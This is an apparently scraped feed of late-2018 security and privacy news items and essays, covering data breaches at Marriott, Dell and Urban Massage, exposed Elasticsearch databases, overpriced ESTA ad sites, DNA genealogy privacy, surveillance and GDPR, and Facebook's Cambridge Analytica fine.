The first IP discovered by the experts on November 14, contained the personal information of 56,934,021 U.S. citizens (i.e. name, email, address, state, zip, phone number, IP address, and also employers and job title).

Experts discovered a second Index of the same archive that contained more than 25 million records with more detailed information (i.e. name, company details, zip address, carrier route, latitude/longitude, census tract, phone number, web address, email, employees count, revenue numbers, NAICS codes, SIC codes, and etc).

Elasticsearch instances data leak

Overall, HackenProof says (PDF), 82,851,841 people were impacted by this data breach.

The overall number of records exposed in the unprotected Elasticsearch instances is over 114,686,118 (114,686,118), according to HackenProof 2,851,841 individuals were impacted by this data leak.

At the time it is not clear which is the ownership of the exposed Elasticsearch instances, experts speculate that Data & Leads Inc. could be the data source.

Experts attempted to notify the incident to the company, but they did not receive any reply. The company website was taken offline just after the publication of the report.

It is not possible to determine for how long data remained exposed online, the good news is that the huge trove of data is no longer available.

“While the source of the leak was not immediately identifiable, the structure of the field ‘source’ in data fields is similar to those used by a data management company Data & Leads Inc. However, we weren’t able to get in touch with their representatives.” continues the blog post.

“Moreover, shortly before this publication Data & Leads website went offline and now is unavailable.”

In September, security experts from the firm Kromtech have discovered 4,000 compromised instances of open source analytics and search tool Elasticsearch that were running PoS malware.

Earlier 2017, the number of internet-accessible Elasticsearch installs was roughly 35,000.

In July, the security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server.

Unprotected Elasticsearch instances are a gift for hackers and cybercriminals, hackers can compromise them by installing a malware and gain full administrative privileges on the underlying servers.

Pierluigi Paganini

(Security Affairs – Elasticsearch installs, hacking)

 

The post Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances appeared first on Security Affairs.

The Digital Deciders and The Future of Internet

Recently, the nonpartisan think tank New America published a report called “The Digital Deciders” or “how a group of often overlooked countries could hold the keys to the future of the global Internet.” The authors of the report are Robert Morgus, Jocelyn Woolbright and Justin Sherman. The purpose of this thorough and comprehensive report is […]… Read More

The post The Digital Deciders and The Future of Internet appeared first on The State of Security.

Massive Marriott Breach Underscores Risk of overlooking Data Liability

The Marriott breach underscores how companies fail to price in the risk of poor data security. In the age of GDPR, that could be an expensive failure. 

The post Massive Marriott Breach Underscores Risk of overlooking Data Liability appeared first on The Security Ledger.

Related Stories

Marriott hotel data breach: Sensitive data of 500 million guests stolen

By Waqas

Marriott has announced that it has suffered a massive data breach after attackers hacked its guest reservation system at Starwood hotels, a group of hotels the company took over in 2016 – These hotels include Sheraton, St. Regis, Westin and W Hotels. The breach was discovered last week after Marriott’s internal security tool alerted the company regarding an attempt to access the […]

This is a post from HackRead.com Read the original post: Marriott hotel data breach: Sensitive data of 500 million guests stolen

Companies ‘Can Sack Workers For Refusing To Use Fingerprint Scanners’

Businesses using fingerprint scanners to monitor their workforce can legally sack employees who refuse to hand over biometric information on privacy grounds, the Fair Work Commission has ruled. From a report: The ruling, which will be appealed, was made in the case of Jeremy Lee, a Queensland sawmill worker who refused to comply with a new fingerprint scanning policy introduced at his work in Imbil, north of the Sunshine Coast, late last year. Fingerprint scanning was used to monitor the clock-on and clock-off times of about 150 sawmill workers at two sites and was preferred to swipe cards because it prevented workers from fraudulently signing in on behalf of their colleagues to mask absences. The company, Superior Woods, had no privacy policy covering workers and failed to comply with a requirement to properly notify individuals about how and why their data was being collected and used. The biometric data was stored on servers located off-site, in space leased from a third party. Lee argued the business had never sought its workers' consent to use fingerprint scanning, and feared his biometric data would be accessed by unknown groups and individuals.

Read more of this story at Slashdot.

Industry reactions to the enormous Marriott data breach

On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database in the United States. Marriott engaged security experts to help determine what occurred. Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. The company recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, … More

The post Industry reactions to the enormous Marriott data breach appeared first on Help Net Security.

Marriott Says 500 million Starwood Guest Records Stolen in Massive Data Breach

An anonymous reader writes: Starwood Hotels has confirmed its hotel guest database of about 500 million customers has been stolen in a data breach. The hotel and resorts giant said in a statement filed with U.S. regulators that the "unauthorized access" to its guest database was detected on or before September 10 -- but may have dated back as far as 2014. "Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014," said the statement. "Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it." Specific details of the breach remain unknown. We've contacted Starwood for more and will update when we hear back. The company said hat it obtained and decrypted the database on November 19 and "determined that the contents were from the Starwood guest reservation database." Some 327 million records contained a guest's name, postal address, phone number, date of birth, gender, email address, passport number, Starwood's rewards information (including points and balance), arrival and departure information, reservation date, and their communication preferences.

Read more of this story at Slashdot.

Data Breach Exposes Records of 114 Million U.S. Citizens, Companies

A massive database holding more than 114 million records of U.S. citizens and companies was discovered sitting online unprotected due to misconfigured search, a data leak that is estimated to affect about 83 million people.

The post Data Breach Exposes Records of 114 Million U.S. Citizens, Companies appeared first on The Security Ledger.

Related Stories

Facebook Mulled Charging for Access to User Data

Facebook on Wednesday said it considered charging application makers to access data at the social network.

Such a move would have been a major shift away from the policy of not selling Facebook members' information, which the social network has stressed in the face of criticism alleging it is more interested in making money than protecting privacy.

read more

SecurityWeek RSS Feed: Facebook Mulled Charging for Access to User Data

Facebook on Wednesday said it considered charging application makers to access data at the social network.

Such a move would have been a major shift away from the policy of not selling Facebook members' information, which the social network has stressed in the face of criticism alleging it is more interested in making money than protecting privacy.

read more



SecurityWeek RSS Feed

Dunkin Donuts Perks loyalty data breach: Change your password

By Waqas

Dunkin Donuts says it has suffered a data breach in which customer data of its DD Perks loyalty program may have been stolen – The DD Perk is a reward program for the company’s regular customers. According to a now-inaccessible security advisory, Dunkin Donuts stated that the data breach was initially detected on October 31st forcing it to […]

This is a post from HackRead.com Read the original post: Dunkin Donuts Perks loyalty data breach: Change your password

Hackers targeted Dell customer information in attempted attack

Earlier this month, hackers attempted to breach Dell's network and obtain customer information, according to the company. While it says there's no conclusive evidence the hackers were successful in their November 9th attack, it's still possible they obtained some data.

Via: The Verge

Source: Dell (1), (2)

Dell resets all customer passwords after security breach

By Waqas

The computer technology giant Dell has announced on Wednesday that it has suffered a potential security breach in which hackers attempted to steal customer data from its website Dell.com. The incident took place on November 9th when Dell detected and disrupted an attack aimed at the personal data of its customers including names, email addresses, and […]

This is a post from HackRead.com Read the original post: Dell resets all customer passwords after security breach

Keeping data swamps clean for ongoing GDPR compliance

The increased affordability and accessibility of data storage over recent years can be both a benefit and a challenge for businesses. While the ability to stockpile huge volumes and varieties of data can deliver previously unattainable intelligence and insight, it can also result in ‘data sprawl’, with businesses unclear of exactly what information is being stored, where it’s being held, and how it’s being accessed. The introduction of the General Data Protection Regulation (GDPR) in … More

The post Keeping data swamps clean for ongoing GDPR compliance appeared first on Help Net Security.

Blog | Avast EN: UK and Amsterdam Fine Uber £900,000 | Avast

The UK’s Information Commissioner’s Office (ICO) and the Dutch Data Protection Authority (DPA) have each levied fines on international car service Uber to the tune of a collective £900,000. The fines were charged for, in the words of the ICO, “failing to protect customers’ personal information during a cyberattack” as well as allowing their system to be hit by an “avoidable” security problem.



Blog | Avast EN

Real Life Ads Are Taking Scary Inspiration From Social Media

Advertisements in the real world are becoming more technologically sophisticated, integrating facial recognition, location data, artificial intelligence, and other powerful tools that are more commonly associated with your mobile phone. Welcome to the new age of digital marketing. From a report: During this year's Fashion Week in New York, a digital billboard ad for New Balance used A.I. technology to detect and highlight pedestrians wearing "exceptional" outfits. A billboard advertisement for the Chevy Malibu recently targeted drivers on Interstate 88 in Chicago by identifying the brand of vehicle they were driving, then serving ads touting its own features in comparison. And Bidooh, a Manchester-based startup that admits it was inspired by Minority Report, is using facial recognition to serve ads through its billboards in the U.K. and other parts of Europe as well as South Korea. According to its website, Bidooh allows advertisers to target people based on criteria like age, gender, ethnicity, hair color, clothing color, height, body shape, perceived emotion, and the presence of glasses, sunglasses, beards, or mustaches. We've been on the path here since at least a decade ago when the New York Times reported that some digital billboards were equipped with small cameras that could analyze a pedestrian's facial features to serve targeted ads based on gender and approximate age. Things have progressed as you'd expect: In 2016, another Times report described how Clear Channel Outdoor Americas had partnered with companies including AT&T to track people via their mobile phones. The ads could determine the gender and average age of people passing different billboards and determine whether they visited a store after seeing an ad.

Read more of this story at Slashdot.

ESTA registration websites still lurk in paid ads on Google

Google has taken direct action against adverts promoting ESTA registration services, often offered by third parties at highly inflated prices. Ads displayed on the Google network shouldn’t display fees higher than what a public source or government charges for products or services. This tightening of the ad leash has taken a remarkable eight years to complete—and we argue it’s not done yet.

What ESTA services are these sites advertising?

The US Visa Waiver program allows citizens of 38 countries to travel visa free for up to 90 days. This requires an application for eligibility on ESTA (Electronic System for Travel Authorisation). The process is simple and takes only around 10 minutes to fill in an application online. However, many sites have sprung up offering to fill it in on your behalf.

That sounds great!

Sure, everyone hates paperwork, but many people are needlessly paying for service that does, essentially, nothing. The idea is, you fill in the ESTA questions and submit to Homeland Security. You then get an authorisation or a rejection. These sites want you to pay them for filling in essentially the exact same form you’d fill on the USGOV website so they can, in turn, “submit” it on the USGOV submission page. They’ll also often charge a lot more than the standard US$14 submission fee.

That’s…not so great

The flaw here is that if you can submit this information to the third party ESTA registration website, there’s no reason why you couldn’t have just done it yourself on the official USGOV website and saved the additional fee. Once you consider the inflated fees and the fact you might be submitting sensitive personal information and/or payment details to random websites, it quickly becomes an issue.

Why pay $80 instead of $14? It doesn’t really make sense, and this is partly why Google is now cracking down on these sorts of advertisements.

What does Google say about this?

From their Advertising Policies page, Google prohibits the sale of free items. The following is not allowed:

Charging for products or services where the primary offering is available from a government or public source for free or at a lower price

Examples (non-exhaustive list): Services for passport or driving license applications; health insurance applications; documents from official registries, such as birth certificates, marriage certificates, or company registrations; exam results; tax calculators.

Note: You can bundle something free with another product or service that you provide. For example, a TV provider can bundle publicly available content with paid content, or a travel agency can bundle a visa application with a holiday package. But the free product or service can’t be advertised as the primary offering.

Google search results

We thought we’d see what, exactly, is still out there in Google search land. For this, we decided to try common ESTA-related search terms. I went with “ESTA” (naturally), “ESTA questions,” and “ESTA answers.” Here’s what I found:

Search term: ESTA

How popular a Worldwide search term is “ESTA” over time?

esta trends

Click to Enlarge

A search for the word “ESTA” brings back no adverts in the search results whatsoever. That’s good!

esta no ads

Click to enlarge

Search term: ESTA questions

How popular a Worldwide search term is “ESTA questions” over time?

esta question trends

Click to Enlarge

A search for “ESTA questions” returned one result, which is still quite good. However, Google said common search terms would no longer fetch ads. Our search above seems pretty basic and still snagged a hit.

 esta questions

Click to enlarge

The website featured in the advert doesn’t mention cost on the front page, but does on Terms of Use. Their basic fee is US$14 for the USGOV application, and US$85 for their listed services. This is arguably the kind of site Google is trying remove.

Search Term: ESTA answers

How popular a Worldwide search term is “ESTA answers” over time?

esta answer trends

Click to Enlarge

“ESTA answers” returned four adverts.

 esta answers

Click to enlarge

First result: The same site listed for “ESTA questions” also made top spot under this search term.

Second result: Costs a grand total of US$89, which includes the US$14 Government fee. However, they are upfront about the fact that the service charge won’t apply should you apply directly on the Homeland Security portal. Many sites don’t mention this or hide it away in some terms and conditions.

Third result: Uh, an advert for dust extraction systems. At least there’s definitely no overpriced ESTA fee this time around.

Fourth result: The site lists their fees as US$79, which includes the US$14 Government charge.

We’ve reported all sites to Google whose adverts potentially conflict with Google’s ad policies.

How does Yahoo! stack up?

We looked at Yahoo! to see what we could find in terms of ESTA ads. As far as their Policies for Ads go, the closest thing I could find was “Low quality offers and landing page techniques” from the Oath Ad Policies page:

Services that are offered for free by the government and offered by third parties without adding any additional value to the user, such as green card lotteries Display and Native ads promoting body branding, piercings or tattoos

This doesn’t really apply here though, as ESTA carries the $14 application fee. On the other hand, there could well be something else I’ve missed in the numerous terms and conditions for advertisers. With that in mind, let’s see what we found.

Searching for “ESTA” brought back no fewer than four ads under the search bar, and seven down the side, with actual search results quite a bit further down the page.

 esta yahoo

Click to enlarge

In terms of the sites themselves, we had a mixed response with regards to upfront pricing information.

First result: The same site in both “ESTA questions” and “ESTA answers” Google searches returns again, with their now familiar combined fee of $14 and $85.

Second result: No information visible for fees that we could find.

Third result: This site offers a fee of 59 Euros.

Fourth result: We couldn’t find details of pricing, and the FAQ drop-downs didn’t work, so if the information was in there, we couldn’t see it.

Here’s the results for the adverts down the right-hand side:

First result: US$89 for services offered.

Second result: No price or FAQs visible, just a form submission process. There was a webchat, however, and we were able to obtain a price that way instead: 89 Euro/US$100 for a US ESTA submission.

 esta chat

Click to enlarge

Third result: No price visible that we could find.

Fourth result: US$79 plus US$14 Government fee

Fifth result: Nothing visible that we could find.

Sixth result: 84 Euros (this includes a “2-year concierge service”)

Seventh result: £37.82, US$14 Government fee, plus £1 “overseas transition/calling card fee”

Looking for travel assistance online?

There are many pitfalls lurking online the moment you go looking for visas, ESTAs, or anything else. It seems baffling to me that people would pay someone else to submit a form to a third party when they have to fill out the form themselves first. Are the extra services promoted by these sites really worth it? Some claim to retain your data “for up to two years” in case you need to reapply. The ESTA is valid for two years, by which point they’d no longer be retaining your information, so I don’t see how this helps.

“Aha”, they’ll say. “We don’t retain the data for two years in case you need to apply for the ESTA again. We retain it in case you’re denied authorisation so you can have another go!”

Well, great, except not really. If you’re denied an ESTA at application time, that’s the end of that:

If a traveler is denied ESTA authorization and his or her circumstances have not changed, a new application will also be denied. A traveler who is not eligible for ESTA is not eligible for travel under the Visa Waiver Program and should apply for a nonimmigrant visa at a U.S. Embassy or Consulate. Reapplying with false information in order to qualify for a travel authorization will make the traveler permanently ineligible for travel to the United States under the Visa Waiver Program

Time for a little DIY

On a similar note, these sites do offer to check that all of your information is correct before submitting. The information you need to supply for an ESTA is basic stuff, though: name, address, passport number, and answers to a series of yes/no questions. It’s not complicated, and you could easily have a friend or relative look it over before submitting it online yourself. “Concierge” services sound good, but there’s so much information online, you shouldn’t have trouble finding a hotel or a taxi service or anything else for that matter.

If you insist on making use of an ESTA application website, keep in mind the above commentary. You should also be wary of sites that aren’t upfront with their pricing. Pay particular attention as to whether they retain a copy of your data and for how long. If they promote the benefit of retaining it for less than two years in case you want to “reapply,” that’s not a great sign. If they refer to the ESTA as a “visa,” also not good. (It isn’t a visa; it’s access to participation in the Visa Waiver Program.)

Keep your passport and your online wits close to hand, and you won’t have any problems. Safe travels!

The post ESTA registration websites still lurk in paid ads on Google appeared first on Malwarebytes Labs.

Kaspersky Lab official blog: Dangerous liaisons: How relatives and friends give away your secrets

Increasingly, modern technologies are helping people’s secrets move into the public domain. There are many such examples, from massive leaks of personal data to the online appearance of private (and even intimate) photos and messages.

This post will leave aside the countless dossiers kept on every citizen in the databases of government and commercial structures — let’s naively assume that this data is reliably protected from prying eyes (although we all know it isn’t). We shall also discard the loss of flash drives, hacker attacks, and other similar (and sadly regular) incidents. For now, we’ll consider only user uploads of data on the Internet.

The solution would seem simple — if it’s private, don’t publish it. But people are not fully in control of all of their private data; friends or relatives can also post sensitive information about them, sometimes without their consent.

Public genes

The information that goes public might be close to the bone, quite literally. For example, your DNA might appear online without your knowledge. Online services based on genes and genealogy, such as 23andMe, Ancestry.com, GEDmatch, and MyHeritage, have been gaining in popularity of late (incidentally, MyHeritage suffered a leak quite recently, but that’s a topic for a separate post). Users voluntarily hand over a biomaterial sample to these services (saliva or a smear from the inside of the cheek), on which basis their genetic profile is determined in the lab. This can be used, for example, to trace a person’s ancestry or establish genetic predisposition to certain diseases.

Confidentiality is not on the agenda. Genealogical services work by matching profiles with ones already in their database (otherwise, family members will not be found). Users occasionally disclose information about themselves voluntarily for the same reason: so that relatives also using the service can find them. An interesting nuance is that clients of such services simultaneously publish the genealogical information of family members who share their genes. These relatives might not actually want people to track them down, especially based on their DNA.

The benefits of genealogical services are undeniable and have resulted in more than a few happy family reunions. However, it should not be forgotten that public genetic databases can be misused.

Brotherly love

At first glance, the problem of storing genetic information in a public database might seem contrived, with no practical consequences. But the truth is that genealogical services and biomaterial samples (a piece of skin, nail, hair, blood, saliva, etc.) can, under certain circumstances, help identify a person, without so much as a photograph.

The reality of the threat was highlighted in a study published in October in the journal Science. One of the authors, Yaniv Erlich, knows firsthand the ins and outs of this industry; he works for MyHeritage, which provides DNA analysis and family tree services.

According to the research, roughly 15 million people to date have undergone a genetic test and had a profile created in electronic form (other data indicate that MyHeritage alone has more than 92 million users). Focusing on the United States, the researchers predicted that public genetic data would soon allow any American with European ancestry (a very large proportion of those so far tested) to be identified by their DNA. Note that it makes no difference whether the subject initiated the test or whether it was done by a curious relative.

To show how easy DNA identification really is, Erlich’s team took the genetic profile of a member of a genome research project, punched it into the database of the GEDmatch service, and within 24 hours had the name of the owner of the DNA sample, writes Nature.

The method has also proved useful to law enforcers, who have been able to solve several dead-end cases thanks to genealogical online services.

How the DNA chain unmasked a criminal

This past spring, after 44 years of unsuccessful searching, a 72-year-old suspect in a series of murders, rapes, and robberies was arrested in California. He was fingered by genealogical information available online.

Lab analysis of biomaterial found at the crime scene resulted in a genetic profile that met the requirements of public genealogical services. Acting as regular users, the detectives then ran the file through the GEDmatch database and compiled a list of likely relatives of the criminal.

All of the matches — more than a dozen in all — were rather distant relatives (none closer than a second cousin). In other words, these people all had common ancestry with the criminal tracing back to the early nineteenth century. As described by the Washington Post, five genealogists armed with census archives, newspaper obituaries, and other data then proceeded to move from these ancestors forward in time, gradually filling in empty slots in the family tree.

A huge circle of distant but living relatives of the perpetrator was formed. Discarding those who did not fit the age, sex, and other criteria, the investigators eventually homed in on the suspect. The detective team then followed him, got hold of an object with a DNA sample on it, and matched it against the material found at the crime scene many years before. The DNA in the samples was the same, and 72-year-old Joseph James DeAngelo was arrested.

The case spotlighted the main benefit of genealogical online public services over the DNA databases of law-enforcement agencies from the viewpoint of investigators. The latter databases store information only on criminals, whereas the former are full of noncriminal users who cast a virtual net over their relatives.

Now imagine that a person is wanted not by the law, but by a criminal group — maybe an accidental witness or a potential victim. The services are public, so anyone can use them. Not so good.

Incriminating tags

DNA-based searches using public services are still fairly niche. Besides creating genetic profiles, a more common way for well-meaning friends and relatives to inadvertently reveal your whereabouts to criminals, law-enforcement agencies, and the world at large is through the ubiquitous practice of tagging photos, videos, and posts on social media.

Even if no ill-wishers are looking for you, these tags can cause embarrassment. Let’s say a carefree lab technician decides to upload photos from a lively staff party and tags everyone in it, including a distinguished professor. The photos immediately and automatically pop up on the latter’s page, undermining his authority in the eyes of students.

A careless post such as this could well lead to dismissal or worse for the person tagged. By the way, any information in social networks can readily form the missing link in the type of search described above, using the public databases of genealogical services.

How to configure tagging

Social networks allow users to control tags and mentions of themselves to varying degrees. For example, Facebook and VK.com let you remove tags from photos published by others and limit the circle of people who can tag you or view materials with tags of you. Facebook users can keep the photos they upload from being seen by friends of people tagged in them, and the VK.com privacy settings let users create a white list of users allowed to view photos with tagged individuals.

Curiously, Facebook not only encourages users to tag friends through hints generated by face-recognition technology (this feature can be disabled in the account settings), but also helps to control their privacy: The social network sends a notification if that technology spots you in someone else’s pic.

As for Instagram, this is what it has to say on the matter: All people, except those you have blocked, can tag you in their photos and videos. That said, the social network lets you choose whether photos with you tagged appear on your profile automatically or only after your approval. You can also specify who can view these posts in your profile.

Despite these functions offering partial control over where and when you pop up, the potential threats are still numerous. Even if you slap a ban on people tagging you in pictures, your name (including a link to the page) might still be mentioned in the description or comments on a photo. That means that the photo is still linked to you, and keeping track of such leaks is near impossible.

With friends like these

Friends and relatives aren’t the only ones who might give away your secrets to third parties. Technologies themselves can also do it, for example, because of the peculiarities of the recommendations system.

VK.com suggests friending people with whom users have mutual friends in the social network. Meanwhile, the Facebook algorithm is far more active in its search for candidates, sometimes recommending fellow members of a particular group or community (school, university, organization). In addition, the friend-selection process employs users’ contact information uploaded to Facebook from mobile devices. However, Facebook does not disclose all of the criteria by which its algorithm selects potential friends, and sometimes you may be left guessing about how it knows about your social connections.

How does this relate to privacy? Here’s an example. In a particularly awkward case, the system recommended unacquainted patients of a psychiatrist to each other — and one of them even divined what they had in common. Health-related data, especially psychiatric, is among the most sensitive there is. Not many would voluntarily agree to it being stored on social media.

Similar cases were cited in a US Senate Committee appeal to Facebook following the Senate hearing in April 2018 on Facebook users’ privacy. In its response, the company did not comment on cases involving patients, listing only the abovementioned sources of information for its friend-suggestion algorithm.

What next?

The Internet already stores far more social and even biological information about us than we might imagine. And one reason we can’t always control it is simply that we don’t know about it. With the advance of new technologies, it is highly likely that the very concept of private data will soon become a thing of the past — our real and online selves are becoming increasingly intertwined, and any secret on the Internet will be outed sooner or later.

However, the problem of online privacy has been raised lately at the level of governments worldwide, so perhaps people can still find a way to fence themselves off from nosy outsiders.



Kaspersky Lab official blog

Lenovo to pay $7.3m for installing adware in 750,000 laptops

By Waqas

In 2015, Beijing based laptop manufacturer and seemingly reliable technology company Lenovo made headlines that its 750,000 laptops had pre-installed adware called VisualDiscovery developed by Superfish. The adware played a vital role in compromising online security protections installed by the users on their laptops, accessed financial data and performed man-in-the-middle attack on private and secure connections […]

This is a post from HackRead.com Read the original post: Lenovo to pay $7.3m for installing adware in 750,000 laptops

Customer Service Agents Might Be Able To See What You’re Typing In Real Time

Gizmodo is warning that some customer service agents might be able to see what you're typing in real time. A reader sent them a transcript from a conversation they had with a mattress company after the agent responded to a message he hadn't sent yet. From the report: Something similar recently happened to HmmDaily's Tom Scocca. He got a detailed answer from an agent one second after he hit send. Googling led Scocca to a live chat service that offers a feature it calls "real-time typing view" to allow agents to have their "answers prepared before the customer submits his questions." Another live chat service, which lists McDonalds, Ikea, and Paypal as its customers, calls the same feature "message sneak peek," saying it will allow you to "see what the visitor is typing in before they send it over." Salesforce Live Agent also offers "sneak peak." This particular magic trick happens thanks to JavaScript operating in your browser and detecting what's happening on a particular site in real time. It's also how companies capture information you've entered into web forms before you've hit submit. Companies could lessen the creepiness by telling people their typing is seen in real time or could eliminate the send button altogether. So if you don't want to be monitored or send secret messages to agents, put your phone on mute while on hold and copy/paste messages from another document to your customer service chatbox. And in general, be nice to customer service agents. It's not their fault.

Read more of this story at Slashdot.

Urban Massage Data Breach Exposed Sensitive Comments On Its Creepy Clients

An anonymous reader shares a report from TechCrunch: Urban Massage, a popular massage startup that bills itself as providing "wellness that comes to you," has leaked its entire customer database. The London, U.K.-based startup -- now known as just Urban -- left its Google-hosted ElasticSearch database online without a password, allowing anyone to read hundreds of thousands of customer and staff records. Anyone who knew where to look could access, edit or delete the database. It's not known how long the database was exposed or if anyone else had accessed or obtained the database before it was pulled. It's believed that the database was exposed for at least a few weeks. Urban pulled the database offline after TechCrunch reached out. Among the records included thousands of complaints from workers about their clients. The records included specific complaints -- from account blocks for fraudulent behavior, abuse of the referral system and persistent cancelers. But, many records also included allegations of sexual misconduct by clients -- such as asking for "massage in genital area" and requesting "sexual services from therapist." Others were marked as "dangerous," while others were blocked due to "police enquiries." Each complaint included a customer's personally identifiable information -- including their name, address and postcode and phone number.

Read more of this story at Slashdot.

How Surveillance Inhibits Freedom of Expression

In my book Data and Goliath, I write about the value of privacy. I talk about how it is essential for political liberty and justice, and for commercial fairness and equality. I talk about how it increases personal freedom and individual autonomy, and how the lack of it makes us all less secure. But this is probably the most important argument as to why society as a whole must protect privacy: it allows society to progress.

We know that surveillance has a chilling effect on freedom. People change their behavior when they live their lives under surveillance. They are less likely to speak freely and act individually. They self-censor. They become conformist. This is obviously true for government surveillance, but is true for corporate surveillance as well. We simply aren't as willing to be our individual selves when others are watching.

Let's take an example: hearing that parents and children are being separated as they cross the US border, you want to learn more. You visit the website of an international immigrants' rights group, a fact that is available to the government through mass Internet surveillance. You sign up for the group's mailing list, another fact that is potentially available to the government. The group then calls or e-mails to invite you to a local meeting. Same. Your license plates can be collected as you drive to the meeting; your face can be scanned and identified as you walk into and out of the meeting. If, instead of visiting the website, you visit the group's Facebook page, Facebook knows that you did and that feeds into its profile of you, available to advertisers and political activists alike. Ditto if you like their page, share a link with your friends, or just post about the issue.

Maybe you are an immigrant yourself, documented or not. Or maybe some of your family is. Or maybe you have friends or coworkers who are. How likely are you to get involved if you know that your interest and concern can be gathered and used by government and corporate actors? What if the issue you are interested in is pro- or anti-gun control, anti-police violence or in support of the police? Does that make a difference?

Maybe the issue doesn't matter, and you would never be afraid to be identified and tracked based on your political or social interests. But even if you are so fearless, you probably know someone who has more to lose, and thus more to fear, from their personal, sexual, or political beliefs being exposed.

This isn't just hypothetical. In the months and years after the 9/11 terrorist attacks, many of us censored what we spoke about on social media or what we searched on the Internet. We know from a 2013 PEN study that writers in the United States self-censored their browsing habits out of fear the government was watching. And this isn't exclusively an American event; Internet self-censorship is prevalent across the globe, China being a prime example.

Ultimately, this fear stagnates society in two ways. The first is that the presence of surveillance means society cannot experiment with new things without fear of reprisal, and that means those experiments­ -- if found to be inoffensive or even essential to society -- ­cannot slowly become commonplace, moral, and then legal. If surveillance nips that process in the bud, change never happens. All social progress­ -- from ending slavery to fighting for women's rights­ -- began as ideas that were, quite literally, dangerous to assert. Yet without the ability to safely develop, discuss, and eventually act on those assertions, our society would not have been able to further its democratic values in the way that it has.

Consider the decades-long fight for gay rights around the world. Within our lifetimes we have made enormous strides to combat homophobia and increase acceptance of queer folks' right to marry. Queer relationships slowly progressed from being viewed as immoral and illegal, to being viewed as somewhat moral and tolerated, to finally being accepted as moral and legal.

In the end, it was the public nature of those activities that eventually slayed the bigoted beast, but the ability to act in private was essential in the beginning for the early experimentation, community building, and organizing.

Marijuana legalization is going through the same process: it's currently sitting between somewhat moral, and­ -- depending on the state or country in question -- ­tolerated and legal. But, again, for this to have happened, someone decades ago had to try pot and realize that it wasn't really harmful, either to themselves or to those around them. Then it had to become a counterculture, and finally a social and political movement. If pervasive surveillance meant that those early pot smokers would have been arrested for doing something illegal, the movement would have been squashed before inception. Of course the story is more complicated than that, but the ability for members of society to privately smoke weed was essential for putting it on the path to legalization.

We don't yet know which subversive ideas and illegal acts of today will become political causes and positive social change tomorrow, but they're around. And they require privacy to germinate. Take away that privacy, and we'll have a much harder time breaking down our inherited moral assumptions.

The second way surveillance hurts our democratic values is that it encourages society to make more things illegal. Consider the things you do­ -- the different things each of us does­ -- that portions of society find immoral. Not just recreational drugs and gay sex, but gambling, dancing, public displays of affection. All of us do things that are deemed immoral by some groups, but are not illegal because they don't harm anyone. But it's important that these things can be done out of the disapproving gaze of those who would otherwise rally against such practices.

If there is no privacy, there will be pressure to change. Some people will recognize that their morality isn't necessarily the morality of everyone­ -- and that that's okay. But others will start demanding legislative change, or using less legal and more violent means, to force others to match their idea of morality.

It's easy to imagine the more conservative (in the small-c sense, not in the sense of the named political party) among us getting enough power to make illegal what they would otherwise be forced to witness. In this way, privacy helps protect the rights of the minority from the tyranny of the majority.

This is how we got Prohibition in the 1920s, and if we had had today's surveillance capabilities in the 1920s, it would have been far more effectively enforced. Recipes for making your own spirits would have been much harder to distribute. Speakeasies would have been impossible to keep secret. The criminal trade in illegal alcohol would also have been more effectively suppressed. There would have been less discussion about the harms of Prohibition, less "what if we didn't?" thinking. Political organizing might have been difficult. In that world, the law might have stuck to this day.

China serves as a cautionary tale. The country has long been a world leader in the ubiquitous surveillance of its citizens, with the goal not of crime prevention but of social control. They are about to further enhance their system, giving every citizen a "social credit" rating. The details are yet unclear, but the general concept is that people will be rated based on their activities, both online and off. Their political comments, their friends and associates, and everything else will be assessed and scored. Those who are conforming, obedient, and apolitical will be given high scores. People without those scores will be denied privileges like access to certain schools and foreign travel. If the program is half as far-reaching as early reports indicate, the subsequent pressure to conform will be enormous. This social surveillance system is precisely the sort of surveillance designed to maintain the status quo.

For social norms to change, people need to deviate from these inherited norms. People need the space to try alternate ways of living without risking arrest or social ostracization. People need to be able to read critiques of those norms without anyone's knowledge, discuss them without their opinions being recorded, and write about their experiences without their names attached to their words. People need to be able to do things that others find distasteful, or even immoral. The minority needs protection from the tyranny of the majority.

Privacy makes all of this possible. Privacy encourages social progress by giving the few room to experiment free from the watchful eye of the many. Even if you are not personally chilled by ubiquitous surveillance, the society you live in is, and the personal costs are unequivocal.

This essay originally appeared in McSweeney's issue #54: "The End of Trust." It was reprinted on Wired.com.

GDPR’s impact: The first six months

GDPR is now six months old – it’s time to take an assessment of the regulation’s impact so far. At first blush it would appear very little has changed. There are no well-publicized actions being taken against offenders. No large fines levied. So does this mean its yet another regulation that will be ignored? Actually nothing could be farther from the truth. The day GDPR came into law complaints were filed by data subjects against … More

The post GDPR’s impact: The first six months appeared first on Help Net Security.

Paris Call: A Missed Call or a Great Opportunity?

Recently, the inventor of the web, Tim Berners-Lee, has launched a global campaign to save the web from the destructive effects of abuse and discrimination, political manipulation, and other threats that plague the online world. In a talk at the opening of the Web Summit in Lisbon, he called on governments, companies and individuals to […]… Read More

The post Paris Call: A Missed Call or a Great Opportunity? appeared first on The State of Security.

Facebook appeals UK fine in Cambridge Analytica privacy Scandal

Facebook appeals 500,000-pound fine for failing to protect users’ personal information in the Cambridge Analytica scandal.

Facebook appeals the fine for failing to protect the privacy of the users in the Cambridge Analytica scandal. Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

Now Facebook is sustaining that U.K regulators failed to prove that British users were directly affected.

Britain’s Information Commissioner Office also found that the company failed to be transparent about how people’s data was harvested by others.

According to the ICO,  even after the misuse of the data was discovered in December 2015, Facebook did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users’data such as the SCL Group, that was able to access the platform until 2018.

Facebook considers the fine as unacceptable because there are many practices online that are commonly accepted even if they threaten the privacy of the users.

“Their reasoning challenges some of the basic principles of how people should be allowed to share information online, with implications which go far beyond just Facebook, which is why we have chosen to appeal,” explained the Facebook lawyer Anna Benckert.

